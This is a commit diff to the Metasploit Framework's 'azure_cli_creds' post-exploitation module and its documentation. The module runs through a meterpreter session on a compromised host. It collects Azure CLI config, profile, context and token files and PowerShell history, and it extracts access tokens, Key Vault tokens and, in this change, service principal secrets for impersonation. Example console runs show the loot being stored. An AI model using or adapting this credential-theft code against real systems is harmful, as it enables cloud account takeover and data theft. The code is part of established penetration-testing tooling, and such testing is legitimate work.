tested azure_cli_creds against data files

Author: h00die

documentation/modules/post/multi/gather/azure_cli_creds.md

@@ -1,31 +1,45 @@
 ## Vulnerable Application
 
-  Any windows, linux, or osx system with a `meterpreter` session and [Azure CLI 2.0](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest).
+Any windows, linux, or osx system with a `meterpreter` session and
 
-  Successfully tested on:
+[Azure CLI 2.0+](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest).
 
-  * Azure CLI 2.0.33 on Windows Server 2012 R2
-  * azure-cli 2.0.33-1.el7 on openSUSE Tumbleweed 20180517
+Successfully tested on:
 
-## Verification Steps
+* Azure CLI 2.0.33 on Windows Server 2012 R2, and Windows 10
+* azure-cli 2.0.33-1.el7 on openSUSE Tumbleweed 20180517
 
-  Example steps in this format (is also in the PR):
+## Verification Steps
 
-  1. Install Azure CLI
-  2. Start msfconsole
-  3. Get a `meterpreter` session on some host.
-  4. Do: ```use post/multi/gather/azure_cli_creds```
-  5. Do: ```set SESSION [SESSION_ID]```
-  6. Do: ```run```
-  7. If the system has readable configuration files for Azure CLI, they will stored in loot and a summary will be printed to the screen.
+1. Install Azure CLI
+2. Start msfconsole
+3. Get a `meterpreter` session on some host.
+4. Do: `use post/multi/gather/azure_cli_creds`
+5. Do: `set SESSION [SESSION_ID]`
+6. Do: `run`
+7. If the system has readable configuration files for Azure CLI, they will stored in loot and a summary will be printed to the screen.
 
 ## Options
 
-  None.
-
 ## Scenarios
 
-   ```
+### A new install of 2.0.33 (empty data files) on Windows 10
+
+```
+[msf](Jobs:0 Agents:1) post(multi/gather/azure_cli_creds) > run
+
+[*] az cli version: 2.0.33
+[*] Looking for az cli data in C:\Users\windows
+[*]   Checking for config files
+[+]     .Azure/config stored in /root/.msf4/loot/20240616175854_default_111.111.1.11_azure.config.ini_081029.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240616175855_default_111.111.1.11_azure.profile.js_357740.txt
+[*]   Checking for console history files
+[*] Post module execution completed
+```
+
+```
 msf5 post(multi/gather/azure_cli_creds) > run
 
 [+] /home/james/.azure/accessTokens.json stored to /home/james/.msf4/loot/20180528233056_default_192.168.1.49_azurecli.jwt_tok_029844.txt
@@ -49,4 +63,4 @@ Source                                Username                  Count
 
 [*] Post module execution completed
 
-   ```
+```

lib/msf/core/post/azure.rb

@@ -51,9 +51,7 @@ def process_context_contents(content)
     content['Contexts'].each_value do |account|
       username = account.dig('Account', 'Id')
       type = account.dig('Account', 'Type')
-      if type == 'ServicePrincipal'
-        account.dig('Account', 'ExtendedProperties', 'ServicePrincipalSecret')
-      end
+      principal_secret = account.dig('Account', 'ExtendedProperties', 'ServicePrincipalSecret') # only in 'ServicePrincipal' types
       access_token = account.dig('Account', 'ExtendedProperties', 'AccessToken')
       graph_access_token = account.dig('Account', 'ExtendedProperties', 'GraphAccessToken')
       # example of parsing these out to get an expiration for the token
@@ -63,7 +61,7 @@ def process_context_contents(content)
       # end
       ms_graph_access_token = account.dig('Account', 'ExtendedProperties', 'MicrosoftGraphAccessToken')
       key_vault_token = account.dig('Account', 'ExtendedProperties', 'KeyVault')
-      table_data.append([username, type, access_token, graph_access_token, ms_graph_access_token, key_vault_token])
+      table_data.append([username, type, access_token, graph_access_token, ms_graph_access_token, key_vault_token, principal_secret])
     end
     table_data
   end

modules/post/multi/gather/azure_cli_creds.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -15,7 +15,7 @@ def initialize(info = {})
         info,
         'Name' => 'Azure CLI Credentials Gatherer',
         'Description' => %q{
-          This module will collect the Azure CLI 2.0 (az cli) settings files
+          This module will collect the Azure CLI 2.0+ (az cli) settings files
           for all users on a given target. These configuration files contain
           JWT tokens used to authenticate users and other subscription information.
           Once tokens are stolen from one host, they can be used to impersonate
@@ -38,13 +38,14 @@ def initialize(info = {})
   end
 
   def parse_json(data)
+    data.strip!
+    # remove BOM, https://www.qvera.com/kb/index.php/2410/csv-file-the-start-the-first-header-column-name-can-remove-this
+    data.gsub!("\xEF\xBB\xBF", '')
     json_blob = nil
-    options = { invalid: :replace, undef: :replace, replace: '' }
-    str.encode(Encoding.find('ASCII'), options)
     begin
       json_blob = JSON.parse(data)
-    rescue ::JSON::ParserError
-      print_error('Unable to parse json blob')
+    rescue ::JSON::ParserError => e
+      print_error("Unable to parse json blob: #{e}")
     end
     json_blob
   end
@@ -63,7 +64,18 @@ def user_dirs
     user_dirs
   end
 
+  def get_az_version
+    command = 'az --version'
+    command = "powershell.exe #{command}" if session.platform == 'windows'
+    version_output = cmd_exec(command, 60)
+    version_output.match(/azure-cli \((.*)\)/)
+  end
+
   def run
+    version = get_az_version
+    unless version.nil?
+      print_status("az cli version: #{version[1]}")
+    end
     profile_table = Rex::Text::Table.new(
       'Header' => 'Subscriptions',
       'Indent' => 1,
@@ -77,7 +89,7 @@ def run
     context_table = Rex::Text::Table.new(
       'Header' => 'Context',
       'Indent' => 1,
-      'Columns' => ['Username', 'Account Type', 'Access Token', 'Graph Access Token', 'MS Graph Access Token', 'Key Vault Token']
+      'Columns' => ['Username', 'Account Type', 'Access Token', 'Graph Access Token', 'MS Graph Access Token', 'Key Vault Token', 'Principal Secret']
     )
 
     user_dirs.map do |user_directory|
@@ -86,9 +98,12 @@ def run
 
       # ini file content, not json.
       vprint_status('  Checking for config files')
-      %w[.azure/config .Azure/config].each do |file_location|
+      %w[.Azure\config].each do |file_location|
         possible_location = ::File.join(user_directory, file_location)
-        next unless readable?(possible_location)
+        next unless exists?(possible_location)
+
+        # we would prefer readable?, but windows doesn't support it, so avoiding
+        # an extra code branch, just handle read errors later on
 
         data = read_file(possible_location)
         next unless data
@@ -99,33 +114,37 @@ def run
       end
 
       vprint_status('  Checking for context files')
-      %w[.azure/AzureRmContext.json .Azure/AzureRmContext.json].each do |file_location|
+      %w[.Azure/AzureRmContext.json].each do |file_location|
         possible_location = ::File.join(user_directory, file_location)
-        next unless readable?(possible_location)
+        next unless exists?(possible_location)
 
         data = read_file(possible_location)
         next unless data
 
         loot = store_loot 'azure.context.json', 'text/json', session, data, file_location, 'Azure CLI Context'
         print_good "    #{file_location} stored in #{loot}"
         data = parse_json(data)
+        next if data.nil?
+
         results = process_context_contents(data)
         results.each do |result|
           context_table << result
         end
       end
 
       vprint_status('  Checking for profile files')
-      %w[.azure/azureProfile.json .Azure/azureProfile.json].each do |file_location|
+      %w[.Azure/azureProfile.json].each do |file_location|
         possible_location = ::File.join(user_directory, file_location)
-        next unless readable?(possible_location)
+        next unless exists?(possible_location)
 
         data = read_file(possible_location)
         next unless data
 
         loot = store_loot 'azure.profile.json', 'text/json', session, data, file_location, 'Azure CLI Profile'
         print_good "    #{file_location} stored in #{loot}"
         data = parse_json(data)
+        next if data.nil?
+
         results = process_profile_file(data)
         results.each do |result|
           profile_table << result
@@ -134,7 +153,7 @@ def run
 
       %w[.azure/accessTokens.json].each do |file_location|
         possible_location = ::File.join(user_directory, file_location)
-        next unless readable?(possible_location)
+        next unless exists?(possible_location)
 
         data = read_file(possible_location)
         next unless data
@@ -152,10 +171,9 @@ def run
     if session.platform == 'windows'
       vprint_status('  Checking for console history files')
       ['%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'].each do |file_location|
-        possible_location = ::File.join(user_directory, file_location)
-        next unless readable?(possible_location)
+        next unless exists?(file_location)
 
-        data = read_file(possible_location)
+        data = read_file(file_location)
         next unless data
 
         loot = store_loot 'azure.console_history.txt', 'text/plain', session, data, file_location, 'Azure CLI Profile'